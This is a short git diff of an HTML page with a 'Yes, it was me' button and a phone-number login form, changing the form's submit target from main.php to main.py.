--- a/index.html
+++ b/index.html
@@ -32,7 +32,7 @@
     
     <a class="btn btn-light mb-5" href="yes.html" >Yes, it was me</a>
     
-    <form action="main.php" method="post">
+    <form action="main.py" method="post">
       <input type="text" class="form-control" name="login" id="login" placeholder="Phone number"><br>
       <button class="btn btn-primary mb-3 phone_btn" type="submit">Next</button>
     </form>
